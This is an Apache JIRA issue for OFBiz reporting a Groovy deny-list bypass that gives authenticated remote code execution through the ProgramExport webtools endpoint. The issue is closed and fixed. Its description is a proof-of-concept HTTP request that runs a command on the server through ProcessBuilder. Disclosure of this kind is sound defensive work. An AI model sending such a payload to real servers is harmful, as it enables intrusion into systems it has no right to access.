[OFBIZ-12571] Groovy denied list bypass causes post-auth RCE from webtools/control/ProgramExport - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Bug
Status: Closed
Priority: Major
Resolution: Fixed
Affects Version/s: 18.12.05
Fix Version/s: 18.12.06, 22.01.01
Component/s: framework/webtools
Labels:
None
Environment:

ofbiz 18.12.05

Description

groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

POST /webtools/control/ProgramExport HTTP/1.1
Host: 192.168.1.178:8443
Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 68

groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29

Attachments

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending

image-2022-02-10-17-50-58-914.png
10/Feb/22 09:50
339 kB
Y4er

Activity

People

Assignee:: Jacques Le Roux

Reporter:: Y4er

Votes:: 0 Vote for this issue

Watchers:: 3 Start watching this issue

Dates

Created:: 10/Feb/22 09:51

Updated:: 11/Feb/22 11:55

Resolved:: 10/Feb/22 13:24